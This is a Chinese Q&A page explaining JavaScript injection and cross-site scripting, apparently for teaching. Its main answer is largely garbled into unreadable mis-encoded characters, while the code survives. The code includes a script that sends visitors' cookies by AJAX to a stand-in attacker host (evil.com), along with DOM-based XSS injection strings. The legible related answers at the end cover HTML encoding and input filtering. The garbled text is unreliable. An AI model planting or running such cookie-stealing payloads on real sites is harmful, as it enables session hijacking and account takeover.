什么是JavaScript注入及简单的防御方法

如题所述

推荐答案 2017-07-08

å¾å¤ç½ç«é½æç§ä¿¡æèçè¨æ¿åè½ãç»å½ç¨æ·å¯ä»¥åè¡¨è¯è®ºæèç»å¶ä»ç¨æ·(åæ¬ç®¡çå)åéç§ä¿¡ãä¸ä¸ªæç®åçæ¨¡æè¡¨åå¦ä¸:

<form action="sendmessage.php" method="post'">
<textarea name="message"> </textarea>
<input type="submit" value="send" />
</form>

å½ç¨æ·ç¹å»åéæ¶ï¼è¿æ¡æ¶æ¯ä¼è¢«ä¿åå¨æ°æ®åºä¸æå®çæ°æ®è¡¨ä¸ï¼å¦ä¸ä¸ªç¨æ·å½æå¼è¿æ¡æ¶æ¯çæ¶åå°çå°åéçåå®¹ãä½æ¯ï¼å¦æä¸ä¸ªæ¶ææ»å»èåéçåå®¹åå«äºä¸äºjavascriptä»£ç ï¼è¿äºä»£ç ç¨äºå·åææçcookieä¿¡æ¯ãå½ç¨æ·æå¼çå°è¿æ¡æ¶æ¯çæ¶åï¼æ¶æçjavascriptä»£ç å°±ä¼å¾å°æ§è¡ï¼é æææcookieä¿¡æ¯æ³æ¼ãæ»å»èå¯ä»¥å©ç¨è·å¾è¿äºcookieä¿¡æ¯è¿è¡session hijackingä¼è¯å«æï¼ç´æ¥ä»¥åæ³ç¨æ·çèº«ä»½ç»å½å¶ä»ç¨æ·çè´¦æ·ã
æ¶ææ»å»èå¯ä»¥å¨æ¶æ¯æ¡ä¸å å¥ä¸ä¸javascriptä»£ç :

?
var url = "http://www.evil.com/index.php"; //æ»å»èæ§å¶çæå¡å¨
var postStr = "ck=" + document.cookie;
var ajax = null;
if(window.XMLHttpRequest())
{
ajax = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
ajax = new ActiveXObject("Microsoft.XMLHttp");
}
else
{
return;
}
ajax.open("POST", url, true);
ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajax.send(postStr);
ajax.onreadystatechange = function()
{
if(ajax.readyState == 4 && ajax.status == 200)
{
//alert("Done!");
}
}

éè¿AJAXå¼æ¥è¯·æ±ï¼å°è¢«æ»å»èçææcookieä¿¡æ¯åéç»äºæ»å»èæ§å¶çæå¡å¨ãæ»å»èéåå³å¯å©ç¨è¿äºcookieä¿¡æ¯ä»¥âåæ³âç¨æ·çèº«ä»½è¿è¡ç»å½æä½ã
è¿éé¦åè¦çæ¸æ¥å ä¸ªéè¦çé®é¢:
1. cookieçä½ç¨
Cookieï¼ææ¶ä¹ç¨å¶å¤æ°å½¢å¼Cookiesï¼ææäºç½ç«ä¸ºäºè¾¨å«ç¨æ·èº«ä»½ãè¿è¡sessionè·è¸ªèå¨åå¨ç¨æ·æ¬å°ç»ç«¯ä¸çæ°æ®ï¼éå¸¸ç»è¿å å¯ï¼ãå®ä¹äºRFC2109ï¼å·²åºå¼ï¼ï¼ææ°åä»£çè§èæ¯RFC2965ã
ä¹å°±æ¯è¯´ï¼cookieæ¯ç¨æ·åæå¡å¨ä¹é´çæ¡¥æ¢ãæå¡å¨å¯ä»¥ä½¿ç¨sessionæ¥ä¿åç¨æ·çèº«ä»½ä¿¡æ¯(ID,è´ç©è½¦ç)ï¼ä½æ¯éè¦ç¨æ·å¨è®¿é®ç½é¡µ(åéHTTPæ°æ®å)çæ¶åéå¸¦ä¸ç¸åºçcookieï¼éè¿cookieä¸çç¹å®å¼æ¥è¯å«sessionIDï¼æè½æåç¬ç¨æ·ååç¬çsessionèç³»èµ·æ¥ãcookieæ¯æç¶æHTTPäº¤äºçä¸ç§éè¦æºå¶ã
2. æµè§å¨çåæºçç¥
å¨è¿è¡cookieçªåçæ¶åï¼æ»å»èå·åçcookieæ¯ä»ä¹ï¼æ¯å¨é¨cookieï¼è¿æ¯å½åè¿ä¸ªç½ç«çcookieï¼è¦è§£å³è¿ä¸ªé®é¢ï¼æä»¬è¦åäºè§£ä¸äºæµè§å¨çåæºçç¥ã
åæºçç¥ï¼å®æ¯ç±Netscapeæåºçä¸ä¸ªèåçå®å¨çç¥ã
ç°å¨æææ¯æJavaScript çæµè§å¨é½ä¼ä½¿ç¨è¿ä¸ªçç¥ã
æè°åæºæ¯æï¼ååï¼åè®®ï¼ç«¯å£ç¸åã
å½ä¸ä¸ªæµè§å¨çä¸¤ä¸ªtabé¡µä¸åå«æå¼æ¥ ç¾åº¦åè°·æçé¡µé¢
å½æµè§å¨çç¾åº¦tabé¡µæ§è¡ä¸ä¸ªèæ¬çæ¶åä¼æ£æ¥è¿ä¸ªèæ¬æ¯å±äºåªä¸ªé¡µé¢çï¼
å³æ£æ¥æ¯å¦åæºï¼åªæåç¾åº¦åæºçèæ¬æä¼è¢«æ§è¡ã
åæºçç¥(Same Origin Policy)æ¯ä¸ç§çº¦å®ï¼å®æ¯æµè§å¨ææ ¸å¿ä¹æ¯æåºæ¬çå®å¨åè½ï¼å¦æç¼ºå°äºåæºçç¥ï¼åæµè§å¨çæ£å¸¸åè½å¯è½é½ä¼åå°å½±åãå¯ä»¥è¯´webæ¯æå»ºå¨åæºçç¥çåºç¡ä¹ä¸çï¼æµè§å¨åªæ¯éå¯¹åæºçç¥çä¸ç§å®ç°ã
æµè§å¨çåæºçç¥éå¶äºæ¥èªä¸åæºçâdocumentâæèæ¬ï¼å¯¹å½åâdocumentâçè¯»åæèè®¾ç½®æäºå±æ§ãä¸ºäºä¸è®©æµè§å¨çé¡µé¢è¡ä¸ºåçæ··ä¹±ï¼æµè§å¨æåºäºâOriginâ(æº)è¿ä»¥æ¦å¿µï¼æ¥èªä¸åçOriginçå¯¹è±¡æ æ³äºç¸å¹²æ°ã
å ä¸ºåæºçç¥çåå ï¼ä¹å°±å¯¼è´äºæä»¬çXSS Payload(XSSæ»å»ä»£ç )å¿é¡»å¨æä»¬å¸ææ»å»çåä¸ä¸ªåä¸è§¦åãä¾å¦æ»å»èå¦ææ³çªåå¨www.a.comä¸çcookieï¼é£å°±å¿é¡»å¨www.a.comè¿ä¸ªå(å¯ä»¥æ¯ä¸åé¡µé¢ï¼ä½è¦ä¿è¯æ¯åä¸ä¸ªå)ä¸ççæä¸ä¸ªé¡µé¢æ¾ç½®XSSä»£ç ï¼å¯ä»¥æ¯åå¨åï¼ä¹å¯ä»¥æ¯åå°åæDOM Baesdåçã
4. XSSæ»å»çç§ç±»
å¯¹XSSçåç±»æ²¡ææç¡®çæ åï¼ä½ä¸çæ®éå°XSSæ»å»åä¸ºä¸ç±»ãåå°åXSS(non-persistent XSS), åå¨åXSS(persistent XSS), DOM Based XSS
4.1 éæä¹æ§è·¨ç«ç¹èæ¬æ»å»
éæä¹æ§XSSä¹ç§°ä¸ºåå°åè·¨ç«æ¼æ´ãå®æ¯æå¸¸è§çç±»åçXSSãæ¼æ´äº§ççåå æ¯æ»å»èæ³¨å¥çæ°æ®åæ å¨ååºä¸ãå¦æä½ çäºæä»¬ä¸é¢æç¤ºçä¾å,ç¬¬ä¸ä¸ªä¾åæ¯ä¸ä¸ªéæä¹çXSSæ»å»ãä¸ä¸ªå¸åçéæä¹æ§XSSåå«ä¸ä¸ªå¸¦XSSæ»å»åéçé¾æ¥(å³æ¯æ¬¡æ»å»éè¦ç¨æ·çç¹å»)ã
4.2 æä¹çè·¨ç«ç¹èæ¬æ»å»
æä¹åè·¨ç«ç¹èæ¬ä¹ç§°ä¸ºåå¨è·¨ç«ç¹èæ¬ãå®ä¸è¬åçå¨XSSæ»å»åé(ä¸è¬æXSSæ»å»ä»£ç )åå¨å¨ç½ç«æ°æ®åºï¼å½ä¸ä¸ªé¡µé¢è¢«ç¨æ·æå¼çæ¶åæ§è¡ãæ¯å½ç¨æ·æå¼æµè§å¨,èæ¬æ§è¡ãå¨ä¸é¢çç¤ºä¾ä¸,ç¬¬äºä¸ªä¾åå°±å±ç¤ºäºä¸ä¸ªæä¹çXSSæ»å»ãæä¹çXSSç¸æ¯éæä¹æ§XSSæ»å»å±å®³æ§æ´å¤§,å ä¸ºæ¯å½ç¨æ·æå¼é¡µé¢ï¼æ¥çåå®¹æ¶èæ¬å°èªå¨æ§è¡ãè°·æçorkutæ¾ç»å°±éåå°XSSã
4.3 åºäºdomçè·¨ç«ç¹èæ¬æ»å»
åºäºDOMçXSSææ¶ä¹ç§°ä¸ºtype0 XSSãå½ç¨æ·è½å¤éè¿äº¤äºä¿®æ¹æµè§å¨é¡µé¢ä¸çDOM(Document Object Model)å¹¶æ¾ç¤ºå¨æµè§å¨ä¸æ¶ï¼å°±æå¯è½äº§çè¿ç§æ¼æ´ï¼ä»ææä¸æ¥è¯´å®ä¹æ¯åå°åXSSã
éè¿ä¿®æ¹é¡µé¢çDOMèç¹å½¢æçXSSï¼ç§°ä¹ä¸ºDOM Based XSSã

?

1
2
3
4
5
6
7
8
9
10

<script>
function test()
{
var str = document.getElementById("text").value;
document.getElementById("t").innerHTML = "<a href='" + str + "' >testLink</a>";
}
</script>
<div id="t"></div>
<input type="text" id="text" value="" />
<input type="button" id="s" value="write" onclick="test()" />

å¨è¿ä¸ªåºæ¯ä¸ï¼ä»£ç ä¿®æ¹äºé¡µé¢çDOMèç¹ï¼éè¿innerHTMLæä¸æ®µç¨æ·æ°æ®å½ä½HTMLåå¥å°é¡µé¢ä¸ï¼è¿å°±é æäºDOM Based XSS
' onclick=alert(/xss/) '
è¾å¥åï¼é¡µé¢ä»£ç å°±åæäº:
<a href='' onclick=alert(/xss/) '' >testLink</a>
ç¹å»è¿ä¸ªæ°çæçé¾æ¥ï¼èæ¬å°è¢«æ§è¡ã
å®éä¸ï¼è¿éè¿æå¦å¤ä¸ç§å©ç¨æ¹å¼âé¤äºæé ä¸ä¸ªæ°äºä»¶å¤ï¼è¿å¯ä»¥éæ©éåæ<a>æ ç¾ï¼å¹¶æå¥ä¸ä¸ªæ°çHTMLæ ç¾:
'><img src=# onerror=alert(/xss2/) /><'
é¡µé¢ä»£ç åæäº:
<a href=''><img src=# onerror=alert(/xss2/) /><'' >testLink</a>
5. XSSæ¼æ´äº§ççåå
è·¨ç«ç¹èæ¬çä¸»è¦åå æ¯ç¨åºç¿å¯¹ç¨æ·çä¿¡ä»»ãå¼åäººåè½»æ¾å°è®¤ä¸ºç¨æ·æ°¸è¿ä¸ä¼è¯å¾æ§è¡ä»ä¹åºæ ¼çäºæ,æä»¥ä»ä»¬åå»ºåºç¨ç¨åº,å´æ²¡æä½¿ç¨ä»»ä½é¢å¤çä»£ç æ¥è¿æ»¤ç¨æ·è¾å¥ä»¥é»æ¢ä»»ä½æ¶ææ´»å¨ãå¦ä¸ä¸ªåå æ¯,è¿ç§æ»å»æè®¸å¤åä½ï¼ç¨å¶é åºä¸ç§è¡ä¹ææçXSSè¿æ»¤å¨æ¯ä¸ä»¶æ¯è¾å°é¾çäºæã
ä½æ¯è¿åªæ¯ç¸å¯¹çï¼å¯¹ç¨æ·è¾å¥æ°æ®çâç¼ç âåâè¿æ»¤âå¨ä»»ä½æ¶åé½æ¯å¾éè¦çï¼æä»¬å¿é¡»éåä¸äºéå¯¹æ§çææ®µå¯¹å¶è¿è¡é²å¾¡ã

温馨提示：答案为网友推荐，仅供参考

当前网址：http://55.wendadaohang.com/zd/e4GFGc8cGcce8F48Rc.html

相似回答

什么是JavaScript注入攻击答：方法 1：视图中的 HTML 编码阻止 JavaScript 注入攻击的一种简单方法是重新在视图中显示数据时，用 HTML 编码任何网站用户输入的数据 如：<%=Html.Encode(feedback.Message)%> 使用 HTML 编码一个字符串的含意是什么呢？使用 HTML 编码字符串时，危险字符如 < 和 > 被替换为 HTML 实体，如 < ...

什么是javascript注入攻击?答：就是注册的时候输入的信息是一段javascript脚本，如果你没有相应的过滤措施的话，这段js脚本就保存到你的数据库里面了，这样一旦你的网页调用这段数据，网页就会执行这段js程序。

什么是js注入?答：JavaScript注入就是在浏览器地址栏中输入一段js代码，用来改变页面js变量、页面标签的内容。使用Javascript注入，用户不需要关闭或保存网页就可以改变其内容，这是在浏览器的地址栏上完成的。命令的语法如下：javascript:alert(#command#)

什么是javascript注入攻击?答：Javascript注入攻击指的是通过在网页地址后加JavaScript代码，影响系统运作。JavaScript注入漏洞能发生作用主要依赖两个关键的动作，一个是用户要能从界面中注入JavaScript到系统的内存或者后台存储系统中；二是系统中存在一些UI会展示用户注入的数据。比如注入漏洞最常见的就是发生在各种类型的名字中，比如系统中...

js注入,要怎么解决答：和SQL注入防御一样，XSS攻击也是利用了Web页面的编写疏忽，所以还有一种方法就是从Web应用开发的角度来避免：步骤1、对所有用户提交内容进行可靠的输入验证，包括对URL、查询关键字、HTTP头、POST数据等，仅接受指定长度范围内、采用适当格式、采用所预期的字符的内容提交，对其他的一律过滤。步骤2、实现...

大家正在搜

SQL注入的方法和解决方案防御sql注入的最佳方式不能防止sql注入的方法 Spring常用的三种注入方式 sql注入防御方式 sql注入的防御对象 sql注入原理和防止方法避免sql注入的方法判断sql注入的方法